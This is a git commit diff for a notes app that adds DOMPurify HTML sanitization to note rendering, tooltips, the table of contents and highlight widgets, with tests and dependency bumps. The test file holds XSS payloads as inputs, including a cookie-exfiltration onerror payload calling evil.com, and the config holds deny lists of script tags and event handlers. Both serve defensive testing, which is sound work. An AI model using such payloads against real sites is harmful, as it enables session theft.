feat(sanitization): use DOMPurify's included tags

Resolve merge conflicts in:
- apps/client/src/widgets/highlights_list.ts (keep math formula handling)
- apps/server/src/routes/api/options.ts (keep isReadable/isAllowed split, drop dead getSupportedLocales)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

apps/build-docs/package.json

@@ -16,7 +16,7 @@
   "license": "AGPL-3.0-only",
   "packageManager": "pnpm@10.33.0",
   "devDependencies": {
-    "@redocly/cli": "2.25.4",
+    "@redocly/cli": "2.26.0",
     "archiver": "7.0.1",
     "fs-extra": "11.3.4",
     "js-yaml": "4.1.1",

apps/client/package.json

@@ -42,7 +42,7 @@
     "@univerjs/preset-sheets-note": "0.20.0",
     "@univerjs/preset-sheets-sort": "0.20.0",
     "@univerjs/presets": "0.20.0",
-    "@zumer/snapdom": "2.7.0",
+    "@zumer/snapdom": "2.8.0",
     "autocomplete.js": "0.38.1",
     "bootstrap": "5.3.8",
     "boxicons": "2.1.4",
@@ -52,7 +52,7 @@
     "dompurify": "3.3.3",
     "draggabilly": "3.0.0",
     "force-graph": "1.51.2",
-    "i18next": "26.0.3",
+    "i18next": "26.0.4",
     "i18next-http-backend": "3.0.4",
     "jquery": "4.0.0",
     "jquery.fancytree": "2.38.5",

apps/client/src/services/content_renderer_text.ts

@@ -5,6 +5,7 @@ import froca from "./froca.js";
 import link from "./link.js";
 import { renderMathInElement } from "./math.js";
 import { getMermaidConfig } from "./mermaid.js";
+import { sanitizeNoteContentHtml } from "./sanitize_content.js";
 import { formatCodeBlocks } from "./syntax_highlight.js";
 import tree from "./tree.js";
 import { isHtmlEmpty } from "./utils.js";
@@ -14,7 +15,7 @@ export default async function renderText(note: FNote | FAttachment, $renderedCon
     const blob = await note.getBlob();
 
     if (blob && !isHtmlEmpty(blob.content)) {
-        $renderedContent.append($('<div class="ck-content">').html(blob.content));
+        $renderedContent.append($('<div class="ck-content">').html(sanitizeNoteContentHtml(blob.content)));
 
         const seenNoteIds = options.seenNoteIds ?? new Set<string>();
         seenNoteIds.add("noteId" in note ? note.noteId : note.attachmentId);

apps/client/src/services/note_tooltip.ts

@@ -5,6 +5,7 @@ import contentRenderer from "./content_renderer.js";
 import froca from "./froca.js";
 import { t } from "./i18n.js";
 import linkService from "./link.js";
+import { sanitizeNoteContentHtml } from "./sanitize_content.js";
 import treeService from "./tree.js";
 import utils from "./utils.js";
 
@@ -92,8 +93,9 @@ async function mouseEnterHandler<T>(this: HTMLElement, e: JQuery.TriggeredEvent<
         return;
     }
 
-    const html = `<div class="note-tooltip-content">${content}</div>`;
-    const tooltipClass = `tooltip-${  Math.floor(Math.random() * 999_999_999)}`;
+    const sanitizedContent = sanitizeNoteContentHtml(content);
+    const html = `<div class="note-tooltip-content">${sanitizedContent}</div>`;
+    const tooltipClass = `tooltip-${Math.floor(Math.random() * 999_999_999)}`;
 
     // we need to check if we're still hovering over the element
     // since the operation to get tooltip content was async, it is possible that
@@ -110,6 +112,8 @@ async function mouseEnterHandler<T>(this: HTMLElement, e: JQuery.TriggeredEvent<
             title: html,
             html: true,
             template: `<div class="tooltip note-tooltip ${tooltipClass}" role="tooltip"><div class="arrow"></div><div class="tooltip-inner"></div></div>`,
+            // Content is pre-sanitized via DOMPurify so Bootstrap's built-in sanitizer
+            // (which is too aggressive for our rich-text content) can be disabled.
             sanitize: false,
             customClass: linkId
         });

apps/client/src/services/sanitize_content.spec.ts

@@ -0,0 +1,236 @@
+import { describe, expect, it } from "vitest";
+import { sanitizeNoteContentHtml } from "./sanitize_content";
+
+describe("sanitizeNoteContentHtml", () => {
+    // --- Preserves legitimate CKEditor content ---
+
+    it("preserves basic rich text formatting", () => {
+        const html = '<p><strong>Bold</strong> and <em>italic</em> text</p>';
+        expect(sanitizeNoteContentHtml(html)).toBe(html);
+    });
+
+    it("preserves headings", () => {
+        const html = '<h1>Title</h1><h2>Subtitle</h2><h3>Section</h3>';
+        expect(sanitizeNoteContentHtml(html)).toBe(html);
+    });
+
+    it("preserves links with href", () => {
+        const html = '<a href="https://example.com">Link</a>';
+        expect(sanitizeNoteContentHtml(html)).toBe(html);
+    });
+
+    it("preserves internal note links with data attributes", () => {
+        const html = '<a class="reference-link" href="#root/abc123" data-note-path="root/abc123">My Note</a>';
+        const result = sanitizeNoteContentHtml(html);
+        expect(result).toContain('class="reference-link"');
+        expect(result).toContain('href="#root/abc123"');
+        expect(result).toContain('data-note-path="root/abc123"');
+        expect(result).toContain(">My Note</a>");
+    });
+
+    it("preserves images with src", () => {
+        const html = '<img src="api/images/abc123/image.png" alt="test">';
+        expect(sanitizeNoteContentHtml(html)).toContain('src="api/images/abc123/image.png"');
+    });
+
+    it("preserves tables", () => {
+        const html = '<table><thead><tr><th>Header</th></tr></thead><tbody><tr><td>Cell</td></tr></tbody></table>';
+        expect(sanitizeNoteContentHtml(html)).toBe(html);
+    });
+
+    it("preserves code blocks", () => {
+        const html = '<pre><code class="language-javascript">const x = 1;</code></pre>';
+        expect(sanitizeNoteContentHtml(html)).toBe(html);
+    });
+
+    it("preserves include-note sections with data-note-id", () => {
+        const html = '<section class="include-note" data-note-id="abc123">&nbsp;</section>';
+        const result = sanitizeNoteContentHtml(html);
+        expect(result).toContain('class="include-note"');
+        expect(result).toContain('data-note-id="abc123"');
+        expect(result).toContain("&nbsp;</section>");
+    });
+
+    it("preserves figure and figcaption", () => {
+        const html = '<figure><img src="test.png"><figcaption>Caption</figcaption></figure>';
+        expect(sanitizeNoteContentHtml(html)).toContain("<figure>");
+        expect(sanitizeNoteContentHtml(html)).toContain("<figcaption>");
+    });
+
+    it("preserves task list checkboxes", () => {
+        const html = '<ul><li><input type="checkbox" checked disabled>Task done</li></ul>';
+        const result = sanitizeNoteContentHtml(html);
+        expect(result).toContain('type="checkbox"');
+        expect(result).toContain("checked");
+    });
+
+    it("preserves inline styles for colors", () => {
+        const html = '<span style="color: red;">Red text</span>';
+        const result = sanitizeNoteContentHtml(html);
+        expect(result).toContain("style");
+        expect(result).toContain("color");
+    });
+
+    it("preserves data-* attributes", () => {
+        const html = '<div data-custom-attr="value" data-note-id="abc">Content</div>';
+        const result = sanitizeNoteContentHtml(html);
+        expect(result).toContain('data-custom-attr="value"');
+        expect(result).toContain('data-note-id="abc"');
+    });
+
+    // --- Blocks XSS vectors ---
+
+    it("strips script tags", () => {
+        const html = '<p>Hello</p><script>alert("XSS")</script><p>World</p>';
+        const result = sanitizeNoteContentHtml(html);
+        expect(result).not.toContain("<script");
+        expect(result).not.toContain("alert");
+        expect(result).toContain("<p>Hello</p>");
+        expect(result).toContain("<p>World</p>");
+    });
+
+    it("strips onerror event handlers on images", () => {
+        const html = '<img src="x" onerror="alert(1)">';
+        const result = sanitizeNoteContentHtml(html);
+        expect(result).not.toContain("onerror");
+        expect(result).not.toContain("alert");
+    });
+
+    it("strips onclick event handlers", () => {
+        const html = '<div onclick="alert(1)">Click me</div>';
+        const result = sanitizeNoteContentHtml(html);
+        expect(result).not.toContain("onclick");
+        expect(result).not.toContain("alert");
+    });
+
+    it("strips onload event handlers", () => {
+        const html = '<img src="x" onload="alert(1)">';
+        const result = sanitizeNoteContentHtml(html);
+        expect(result).not.toContain("onload");
+        expect(result).not.toContain("alert");
+    });
+
+    it("strips onmouseover event handlers", () => {
+        const html = '<span onmouseover="alert(1)">Hover</span>';
+        const result = sanitizeNoteContentHtml(html);
+        expect(result).not.toContain("onmouseover");
+        expect(result).not.toContain("alert");
+    });
+
+    it("strips onfocus event handlers", () => {
+        const html = '<input onfocus="alert(1)" autofocus>';
+        const result = sanitizeNoteContentHtml(html);
+        expect(result).not.toContain("onfocus");
+        expect(result).not.toContain("alert");
+    });
+
+    it("strips javascript: URIs in href", () => {
+        const html = '<a href="javascript:alert(1)">Click</a>';
+        const result = sanitizeNoteContentHtml(html);
+        expect(result).not.toContain("javascript:");
+    });
+
+    it("strips javascript: URIs in img src", () => {
+        const html = '<img src="javascript:alert(1)">';
+        const result = sanitizeNoteContentHtml(html);
+        expect(result).not.toContain("javascript:");
+    });
+
+    it("strips iframe tags", () => {
+        const html = '<iframe src="https://evil.com"></iframe>';
+        const result = sanitizeNoteContentHtml(html);
+        expect(result).not.toContain("<iframe");
+    });
+
+    it("strips object tags", () => {
+        const html = '<object data="evil.swf"></object>';
+        const result = sanitizeNoteContentHtml(html);
+        expect(result).not.toContain("<object");
+    });
+
+    it("strips embed tags", () => {
+        const html = '<embed src="evil.swf">';
+        const result = sanitizeNoteContentHtml(html);
+        expect(result).not.toContain("<embed");
+    });
+
+    it("strips style tags", () => {
+        const html = '<style>body { background: url("javascript:alert(1)") }</style><p>Text</p>';
+        const result = sanitizeNoteContentHtml(html);
+        expect(result).not.toContain("<style");
+        expect(result).toContain("<p>Text</p>");
+    });
+
+    it("strips SVG with embedded script", () => {
+        const html = '<svg><script>alert(1)</script></svg>';
+        const result = sanitizeNoteContentHtml(html);
+        expect(result).not.toContain("<script");
+        expect(result).not.toContain("alert");
+    });
+
+    it("strips meta tags", () => {
+        const html = '<meta http-equiv="refresh" content="0;url=evil.com"><p>Text</p>';
+        const result = sanitizeNoteContentHtml(html);
+        expect(result).not.toContain("<meta");
+    });
+
+    it("strips base tags", () => {
+        const html = '<base href="https://evil.com/"><p>Text</p>';
+        const result = sanitizeNoteContentHtml(html);
+        expect(result).not.toContain("<base");
+    });
+
+    it("strips link tags", () => {
+        const html = '<link rel="stylesheet" href="evil.css"><p>Text</p>';
+        const result = sanitizeNoteContentHtml(html);
+        expect(result).not.toContain("<link");
+    });
+
+    // --- Edge cases ---
+
+    it("handles empty string", () => {
+        expect(sanitizeNoteContentHtml("")).toBe("");
+    });
+
+    it("handles null-like falsy values", () => {
+        expect(sanitizeNoteContentHtml(null as unknown as string)).toBe(null);
+        expect(sanitizeNoteContentHtml(undefined as unknown as string)).toBe(undefined);
+    });
+
+    it("handles nested XSS attempts", () => {
+        const html = '<div><p>Safe</p><img src=x onerror="fetch(\'https://evil.com/?c=\'+document.cookie)"><p>Also safe</p></div>';
+        const result = sanitizeNoteContentHtml(html);
+        expect(result).not.toContain("onerror");
+        expect(result).not.toContain("fetch");
+        expect(result).not.toContain("cookie");
+        expect(result).toContain("Safe");
+        expect(result).toContain("Also safe");
+    });
+
+    it("handles case-varied event handlers", () => {
+        const html = '<img src="x" ONERROR="alert(1)">';
+        const result = sanitizeNoteContentHtml(html);
+        expect(result.toLowerCase()).not.toContain("onerror");
+    });
+
+    it("strips dangerous data: URI on anchor elements", () => {
+        const html = '<a href="data:text/html,<script>alert(1)</script>">Click</a>';
+        const result = sanitizeNoteContentHtml(html);
+        // DOMPurify should either strip the href or remove the dangerous content
+        expect(result).not.toContain("<script");
+        expect(result).not.toContain("alert(1)");
+    });
+
+    it("allows data: URI on image elements", () => {
+        const html = '<img src="data:image/png;base64,iVBOR...">';
+        const result = sanitizeNoteContentHtml(html);
+        expect(result).toContain("data:image/png");
+    });
+
+    it("strips template tags which could contain scripts", () => {
+        const html = '<template><script>alert(1)</script></template>';
+        const result = sanitizeNoteContentHtml(html);
+        expect(result).not.toContain("<script");
+        expect(result).not.toContain("<template");
+    });
+});

apps/client/src/services/sanitize_content.ts

@@ -0,0 +1,115 @@
+/**
+ * Client-side HTML sanitization for note content rendering.
+ *
+ * This module provides sanitization of HTML content before it is injected into
+ * the DOM, preventing stored XSS attacks. Content written through non-CKEditor
+ * paths (Internal API, ETAPI, Sync) may contain malicious scripts, event
+ * handlers, or other XSS vectors that must be stripped before rendering.
+ *
+ * Uses DOMPurify, a well-audited XSS sanitizer that is already a transitive
+ * dependency of this project (via mermaid).
+ *
+ * The configuration is intentionally permissive for rich-text formatting
+ * (bold, italic, headings, tables, images, links, etc.) while blocking
+ * script execution vectors (script tags, event handlers, javascript: URIs,
+ * data: URIs on non-image elements, etc.).
+ */
+import DOMPurify, { type Config as DOMPurifyConfig } from "dompurify";
+
+/**
+ * URI-safe protocols allowed in href/src attributes.
+ * Blocks javascript:, vbscript:, and other dangerous schemes.
+ */
+// Note: data: is intentionally omitted here; it is handled via ADD_DATA_URI_TAGS
+// which restricts data: URIs to only <img> elements.
+const ALLOWED_URI_REGEXP = /^(?:(?:https?|ftps?|mailto|evernote|file|gemini|git|gopher|irc|irc6|jabber|magnet|sftp|skype|sms|spotify|steam|svn|tel|smb|zotero|geo|obsidian|logseq|onenote|slack):|[^a-z]|[a-z+.\-]+(?:[^a-z+.\-:]|$))/i;
+
+/**
+ * DOMPurify configuration for sanitizing note content.
+ *
+ * Uses DOMPurify's built-in security-researched profiles for HTML, SVG, and
+ * MathML rather than a hand-maintained tag allowlist. This ensures proper
+ * namespace handling (critical for SVG rendering in mermaid/canvas/mind-map
+ * notes and MathML in KaTeX equations) while staying current with DOMPurify's
+ * upstream security fixes.
+ *
+ * Defense-in-depth is provided via FORBID_TAGS / FORBID_ATTR which explicitly
+ * block known-dangerous elements and all event-handler attributes, regardless
+ * of what the profiles permit.
+ */
+const PURIFY_CONFIG: DOMPurifyConfig = {
+    // Enable DOMPurify's curated safe-element sets for HTML, SVG, and MathML.
+    // This replaces a manual ALLOWED_TAGS list and correctly handles namespace
+    // parsing (e.g. SVG elements must be in the SVG namespace to render).
+    USE_PROFILES: { html: true, svg: true, svgFilters: true, mathMl: true },
+    ALLOWED_URI_REGEXP,
+    // CKEditor data-* attributes not in the default set
+    ADD_ATTR: ["data-note-id", "data-note-path", "data-href", "data-language",
+               "data-value", "data-box-type", "data-link-id", "data-no-context-menu"],
+    // CKEditor custom elements
+    ADD_TAGS: ["en-media"],
+    // ── Explicit deny-lists (defense-in-depth) ──
+    // Script execution vectors
+    FORBID_TAGS: ["script", "style", "iframe", "object", "embed", "link", "meta",
+                  "base", "noscript", "template",
+                  // SVG elements that can execute scripts or embed arbitrary HTML
+                  "foreignObject",
+                  // SVG animation elements — can trigger event handlers via
+                  // onbegin/onend/onrepeat attributes
+                  "animate", "animateMotion", "animateTransform", "set"],
+    // All DOM event-handler attributes
+    FORBID_ATTR: ["onerror", "onload", "onclick", "onmouseover", "onfocus",
+                  "onblur", "onsubmit", "onreset", "onchange", "oninput",
+                  "onkeydown", "onkeyup", "onkeypress", "onmousedown",
+                  "onmouseup", "onmousemove", "onmouseout", "onmouseenter",
+                  "onmouseleave", "ondblclick", "oncontextmenu", "onwheel",
+                  "ondrag", "ondragend", "ondragenter", "ondragleave",
+                  "ondragover", "ondragstart", "ondrop", "onscroll",
+                  "oncopy", "oncut", "onpaste", "onanimationend",
+                  "onanimationiteration", "onanimationstart",
+                  "ontransitionend", "onpointerdown", "onpointerup",
+                  "onpointermove", "onpointerover", "onpointerout",
+                  "onpointerenter", "onpointerleave", "ontouchstart",
+                  "ontouchend", "ontouchmove", "ontouchcancel",
+                  // SVG animation event handlers
+                  "onbegin", "onend", "onrepeat"],
+    // Allow data: URIs only for images (needed for inline images)
+    ADD_DATA_URI_TAGS: ["img"],
+    RETURN_DOM: false,
+    RETURN_DOM_FRAGMENT: false,
+    WHOLE_DOCUMENT: false
+};
+
+// Configure a DOMPurify hook to handle data-* attributes more broadly
+// since CKEditor uses many custom data attributes.
+DOMPurify.addHook("uponSanitizeAttribute", (node, data) => {
+    // Allow all data-* attributes
+    if (data.attrName.startsWith("data-")) {
+        data.forceKeepAttr = true;
+    }
+});
+
+/**
+ * Sanitizes HTML content for safe rendering in the DOM.
+ *
+ * This function should be called on all user-provided HTML content before
+ * inserting it into the DOM via dangerouslySetInnerHTML, jQuery .html(),
+ * or Element.innerHTML.
+ *
+ * The sanitizer preserves rich-text formatting produced by CKEditor
+ * (bold, italic, links, tables, images, code blocks, etc.) while
+ * stripping XSS vectors (script tags, event handlers, javascript: URIs).
+ *
+ * @param dirtyHtml - The untrusted HTML string to sanitize.
+ * @returns A sanitized HTML string safe for DOM insertion.
+ */
+export function sanitizeNoteContentHtml(dirtyHtml: string): string {
+    if (!dirtyHtml) {
+        return dirtyHtml;
+    }
+    return DOMPurify.sanitize(dirtyHtml, PURIFY_CONFIG) as string;
+}
+
+export default {
+    sanitizeNoteContentHtml
+};

apps/client/src/widgets/collections/legacy/ListPrintView.tsx

@@ -4,6 +4,7 @@ import type FNote from "../../../entities/fnote";
 import type { PrintReport } from "../../../print";
 import content_renderer from "../../../services/content_renderer";
 import froca from "../../../services/froca";
+import { sanitizeNoteContentHtml } from "../../../services/sanitize_content";
 import type { ViewModeProps } from "../interface";
 import { filterChildNotes, useFilteredNoteIds } from "./utils";
 
@@ -87,7 +88,7 @@ export function ListPrintView({ note, noteIds: unfilteredNoteIds, onReady, onPro
                 <h1>{note.title}</h1>
 
                 {state.notesWithContent?.map(({ note: childNote, contentEl }) => (
-                    <section id={`note-${childNote.noteId}`} class="note" dangerouslySetInnerHTML={{ __html: contentEl.innerHTML }} />
+                    <section id={`note-${childNote.noteId}`} class="note" dangerouslySetInnerHTML={{ __html: sanitizeNoteContentHtml(contentEl.innerHTML) }} />
                 ))}
             </div>
         </div>

apps/client/src/widgets/collections/presentation/model.ts

@@ -1,6 +1,7 @@
 import { NoteType } from "@triliumnext/commons";
 import FNote from "../../../entities/fnote";
 import contentRenderer from "../../../services/content_renderer";
+import { sanitizeNoteContentHtml } from "../../../services/sanitize_content";
 import { ProgressChangedFn } from "../interface";
 
 type DangerouslySetInnerHTML = { __html: string; };
@@ -72,7 +73,7 @@ async function processContent(note: FNote): Promise<DangerouslySetInnerHTML> {
     const { $renderedContent } = await contentRenderer.getRenderedContent(note, {
         noChildrenList: true
     });
-    return { __html: $renderedContent.html() };
+    return { __html: sanitizeNoteContentHtml($renderedContent.html()) };
 }
 
 async function postProcessSlides(slides: (PresentationSlideModel | PresentationSlideBaseModel)[]) {

apps/client/src/widgets/highlights_list.ts

@@ -9,9 +9,39 @@ import appContext, { type EventData } from "../components/app_context.js";
 import type FNote from "../entities/fnote.js";
 import attributeService from "../services/attributes.js";
 import { t } from "../services/i18n.js";
+import katex from "../services/math.js";
 import options from "../services/options.js";
 import OnClickButtonWidget from "./buttons/onclick_button.js";
 import RightPanelWidget from "./right_panel_widget.js";
+import DOMPurify, { type Config as DOMPurifyConfig } from "dompurify";
+
+/**
+ * DOMPurify configuration for highlight list items. Uses built-in HTML and
+ * MathML profiles for proper namespace handling (KaTeX equations), then
+ * restricts to inline-only elements via FORBID_TAGS.
+ */
+const HIGHLIGHT_PURIFY_CONFIG: DOMPurifyConfig = {
+    USE_PROFILES: { html: true, mathMl: true },
+    FORBID_TAGS: [
+        "script", "style", "iframe", "object", "embed", "link", "meta",
+        "base", "noscript", "template", "form", "input", "textarea",
+        "button", "select", "option",
+        "div", "p", "h1", "h2", "h3", "h4", "h5", "h6",
+        "blockquote", "pre", "section", "article", "aside", "nav",
+        "header", "footer", "main", "figure", "figcaption",
+        "table", "thead", "tbody", "tfoot", "tr", "th", "td",
+        "ul", "ol", "li", "dl", "dt", "dd",
+        "hr", "img", "video", "audio", "picture", "canvas",
+        "svg", "foreignObject"
+    ],
+    FORBID_ATTR: [
+        "onerror", "onload", "onclick", "onmouseover", "onfocus",
+        "onblur", "onsubmit", "onreset", "onchange", "oninput",
+        "onkeydown", "onkeyup", "onkeypress"
+    ],
+    RETURN_DOM: false,
+    RETURN_DOM_FRAGMENT: false
+};
 
 const TPL = /*html*/`<div class="highlights-list-widget">
     <style>
@@ -124,6 +154,77 @@ export default class HighlightsListWidget extends RightPanelWidget {
         this.triggerCommand("reEvaluateRightPaneVisibility");
     }
 
+    extractOuterTag(htmlStr: string | null) {
+        if (htmlStr === null) {
+            return null;
+        }
+        // Regular expressions that match only the outermost tag
+        const regex = /^<([a-zA-Z]+)([^>]*)>/;
+        const match = htmlStr.match(regex);
+        if (match) {
+            const tagName = match[1].toLowerCase(); // Extract tag name
+            const attributes = match[2].trim(); // Extract label attributes
+            return { tagName, attributes };
+        }
+        return null;
+    }
+
+    areOuterTagsConsistent(str1: string | null, str2: string | null) {
+        const tag1 = this.extractOuterTag(str1);
+        const tag2 = this.extractOuterTag(str2);
+        // If one of them has no label, returns false
+        if (!tag1 || !tag2) {
+            return false;
+        }
+        // Compare tag names and attributes to see if they are the same
+        return tag1.tagName === tag2.tagName && tag1.attributes === tag2.attributes;
+    }
+
+    /**
+     * Rendering formulas in strings using katex
+     *
+     * @param html Note's html content
+     * @returns The HTML content with mathematical formulas rendered by KaTeX.
+     */
+    async replaceMathTextWithKatax(html: string) {
+        const mathTextRegex = /<span class="math-tex">\\\(([\s\S]*?)\\\)<\/span>/g;
+        const matches = [...html.matchAll(mathTextRegex)];
+        let modifiedText = html;
+
+        if (matches.length > 0) {
+            // Process all matches asynchronously
+            for (const match of matches) {
+                const latexCode = match[1];
+                let rendered;
+
+                try {
+                    rendered = katex.renderToString(latexCode, {
+                        throwOnError: false
+                    });
+                } catch (e) {
+                    if (e instanceof ReferenceError && e.message.includes("katex is not defined")) {
+                        // Load KaTeX if it is not already loaded
+                        try {
+                            rendered = katex.renderToString(latexCode, {
+                                throwOnError: false
+                            });
+                        } catch (renderError) {
+                            console.error("KaTeX rendering error after loading library:", renderError);
+                            rendered = match[0]; // Fall back to original if error persists
+                        }
+                    } else {
+                        console.error("KaTeX rendering error:", e);
+                        rendered = match[0]; // Fall back to original on error
+                    }
+                }
+
+                // Replace the matched formula in the modified text
+                modifiedText = modifiedText.replace(match[0], rendered);
+            }
+        }
+        return modifiedText;
+    }
+
     async getHighlightList(content: string, optionsHighlightsList: string[]) {
         // matches a span containing background-color
         const regex1 = /<span[^>]*style\s*=\s*[^>]*background-color:[^>]*?>[\s\S]*?<\/span>/gi;
@@ -167,6 +268,9 @@ export default class HighlightsListWidget extends RightPanelWidget {
         const $highlightsList = $("<ol>");
         let prevEndIndex = -1,
             hlLiCount = 0;
+        let prevSubHtml: string | null = null;
+        // Used to determine if a string is only a formula
+        const onlyMathRegex = /^<span class="math-tex">\\\([^\)]*?\)<\/span>(?:<span class="math-tex">\\\([^\)]*?\)<\/span>)*$/;
 
         for (let match: RegExpMatchArray | null = null, hltIndex = 0; (match = combinedRegex.exec(content)) !== null; hltIndex++) {
             const subHtml = match[0];
@@ -180,16 +284,24 @@ export default class HighlightsListWidget extends RightPanelWidget {
 
             if (prevEndIndex !== -1 && startIndex === prevEndIndex) {
                 // If the previous element is connected to this element in HTML, then concatenate them into one.
-                $highlightsList.children().last().append(subHtml);
+                $highlightsList.children().last().append(DOMPurify.sanitize(subHtml, HIGHLIGHT_PURIFY_CONFIG) as string);
             } else {
                 const hasText = $(subHtml).text().trim();
 
                 if (hasText) {
-                    $highlightsList.append(
-                        $("<li>")
-                            .html(subHtml)
-                            .on("click", () => this.jumpToHighlightsList(findSubStr, hltIndex))
-                    );
+                    const substring = content.substring(prevEndIndex, startIndex);
+                    //If the two elements have the same style and there are only formulas in between, append the formulas and the current element to the end of the previous element.
+                    if (this.areOuterTagsConsistent(prevSubHtml, subHtml) && onlyMathRegex.test(substring)) {
+                        const $lastLi = $highlightsList.children("li").last();
+                        $lastLi.append(DOMPurify.sanitize(await this.replaceMathTextWithKatax(substring), HIGHLIGHT_PURIFY_CONFIG) as string);
+                        $lastLi.append(DOMPurify.sanitize(subHtml, HIGHLIGHT_PURIFY_CONFIG) as string);
+                    } else {
+                        $highlightsList.append(
+                            $("<li>")
+                                .html(DOMPurify.sanitize(subHtml, HIGHLIGHT_PURIFY_CONFIG) as string)
+                                .on("click", () => this.jumpToHighlightsList(findSubStr, hltIndex))
+                        );
+                    }
 
                     hlLiCount++;
                 } else {
@@ -198,6 +310,7 @@ export default class HighlightsListWidget extends RightPanelWidget {
                 }
             }
             prevEndIndex = endIndex;
+            prevSubHtml = subHtml;
         }
         return {
             $highlightsList,

apps/client/src/widgets/react/Button.tsx

@@ -1,5 +1,4 @@
 import type { ComponentChildren, CSSProperties, RefObject } from "preact";
-import { memo } from "preact/compat";
 import { useMemo } from "preact/hooks";
 
 import { CommandNames } from "../../components/app_context";
@@ -27,7 +26,7 @@ export interface ButtonProps {
     title?: string;
 }
 
-const Button = memo(({ name, buttonRef, className, text, onClick, keyboardShortcut, icon, kind, disabled, size, style, triggerCommand, ...restProps }: ButtonProps) => {
+function Button({ name, buttonRef, className, text, onClick, keyboardShortcut, icon, kind, disabled, size, style, triggerCommand, ...restProps }: ButtonProps) {
     // Memoize classes array to prevent recreation
     const classes = useMemo(() => {
         const classList: string[] = ["btn"];
@@ -83,7 +82,7 @@ const Button = memo(({ name, buttonRef, className, text, onClick, keyboardShortc
             {text} {shortcutElements}
         </button>
     );
-});
+}
 
 export function ButtonGroup({ children }: { children: ComponentChildren }) {
     return (

apps/client/src/widgets/react/Modal.tsx

@@ -1,7 +1,6 @@
 import { Modal as BootstrapModal } from "bootstrap";
 import clsx from "clsx";
 import { ComponentChildren, CSSProperties, RefObject } from "preact";
-import { memo } from "preact/compat";
 import { useEffect, useMemo, useRef } from "preact/hooks";
 
 import { openDialog } from "../../services/dialog";
@@ -186,7 +185,7 @@ export default function Modal({ children, className, size, title, customTitleBar
     );
 }
 
-const ModalInner = memo(({ children, footer, footerAlignment, bodyStyle, footerStyle: _footerStyle }: Pick<ModalProps, "children" | "footer" | "footerAlignment" | "bodyStyle" | "footerStyle">) => {
+function ModalInner({ children, footer, footerAlignment, bodyStyle, footerStyle: _footerStyle }: Pick<ModalProps, "children" | "footer" | "footerAlignment" | "bodyStyle" | "footerStyle">) {
     // Memoize footer style
     const footerStyle = useMemo<CSSProperties>(() => {
         const style: CSSProperties = _footerStyle ?? {};
@@ -209,4 +208,4 @@ const ModalInner = memo(({ children, footer, footerAlignment, bodyStyle, footerS
             )}
         </>
     );
-});
+}

apps/client/src/widgets/react/RawHtml.tsx

@@ -1,6 +1,8 @@
 import DOMPurify from "dompurify";
 import type { CSSProperties, HTMLProps, RefObject } from "preact/compat";
 
+import { sanitizeNoteContentHtml } from "../../services/sanitize_content.js";
+
 type HTMLElementLike = string | HTMLElement | JQuery<HTMLElement>;
 
 interface RawHtmlProps extends Pick<HTMLProps<HTMLElement>, "tabindex" | "dir"> {
@@ -37,7 +39,7 @@ export function getHtml(html: string | HTMLElement | JQuery<HTMLElement>) {
     }
 
     return {
-        __html: html as string
+        __html: sanitizeNoteContentHtml(html as string)
     };
 }
 

apps/client/src/widgets/toc.ts

@@ -21,6 +21,37 @@ import OnClickButtonWidget from "./buttons/onclick_button.js";
 import appContext, { type EventData } from "../components/app_context.js";
 import katex from "../services/math.js";
 import type FNote from "../entities/fnote.js";
+import DOMPurify, { type Config as DOMPurifyConfig } from "dompurify";
+
+/**
+ * DOMPurify configuration for ToC headings. Uses DOMPurify's built-in HTML
+ * and MathML profiles for proper namespace handling (required for KaTeX
+ * rendered equations), then restricts to inline-only elements via FORBID_TAGS.
+ */
+const TOC_PURIFY_CONFIG: DOMPurifyConfig = {
+    USE_PROFILES: { html: true, mathMl: true },
+    // Block elements that should never appear in a ToC heading
+    FORBID_TAGS: [
+        "script", "style", "iframe", "object", "embed", "link", "meta",
+        "base", "noscript", "template", "form", "input", "textarea",
+        "button", "select", "option",
+        // Block-level elements — headings should only contain inline content
+        "div", "p", "h1", "h2", "h3", "h4", "h5", "h6",
+        "blockquote", "pre", "section", "article", "aside", "nav",
+        "header", "footer", "main", "figure", "figcaption",
+        "table", "thead", "tbody", "tfoot", "tr", "th", "td",
+        "ul", "ol", "li", "dl", "dt", "dd",
+        "hr", "img", "video", "audio", "picture", "canvas",
+        "svg", "foreignObject"
+    ],
+    FORBID_ATTR: [
+        "onerror", "onload", "onclick", "onmouseover", "onfocus",
+        "onblur", "onsubmit", "onreset", "onchange", "oninput",
+        "onkeydown", "onkeyup", "onkeypress"
+    ],
+    RETURN_DOM: false,
+    RETURN_DOM_FRAGMENT: false
+};
 
 const TPL = /*html*/`<div class="toc-widget">
     <style>
@@ -337,7 +368,7 @@ export default class TocWidget extends RightPanelWidget {
             //
 
             const headingText = await this.replaceMathTextWithKatax(m[2]);
-            const $itemContent = $('<div class="item-content">').html(headingText);
+            const $itemContent = $('<div class="item-content">').html(DOMPurify.sanitize(headingText, TOC_PURIFY_CONFIG) as string);
             const $li = $("<li>").append($itemContent)
                 .on("click", () => this.jumpToHeading(headingIndex));
             $ols[$ols.length - 1].append($li);

apps/desktop/package.json

@@ -44,7 +44,7 @@
     "@triliumnext/server": "workspace:*",
     "@types/electron-squirrel-startup": "1.0.2",
     "copy-webpack-plugin": "14.0.0",
-    "electron": "41.1.1",
+    "electron": "41.2.0",
     "prebuild-install": "7.1.3"
   }
 }

apps/edit-docs/package.json

@@ -12,7 +12,7 @@
     "@triliumnext/desktop": "workspace:*",
     "@types/fs-extra": "11.0.4",
     "copy-webpack-plugin": "14.0.0",
-    "electron": "41.1.1",
+    "electron": "41.2.0",
     "fs-extra": "11.3.4"
   },
   "scripts": {

apps/server/package.json

@@ -34,7 +34,7 @@
     "@ai-sdk/google": "3.0.60",
     "@ai-sdk/openai": "3.0.52",
     "@modelcontextprotocol/sdk": "^1.12.1",
-    "ai": "6.0.153",
+    "ai": "6.0.154",
     "better-sqlite3": "12.8.0",
     "html-to-text": "9.0.5",
     "js-yaml": "4.1.1",
@@ -88,7 +88,7 @@
     "debounce": "3.0.0",
     "debug": "4.4.3",
     "ejs": "5.0.1",
-    "electron": "41.1.1",
+    "electron": "41.2.0",
     "electron-window-state": "5.0.3",
     "escape-html": "1.0.3",
     "express": "5.2.1",
@@ -103,7 +103,7 @@
     "html2plaintext": "2.1.4",
     "http-proxy-agent": "9.0.0",
     "https-proxy-agent": "9.0.0",
-    "i18next": "26.0.3",
+    "i18next": "26.0.4",
     "i18next-fs-backend": "2.6.3",
     "image-type": "6.1.0",
     "ini": "6.0.0",

apps/server/src/assets/config-sample.ini

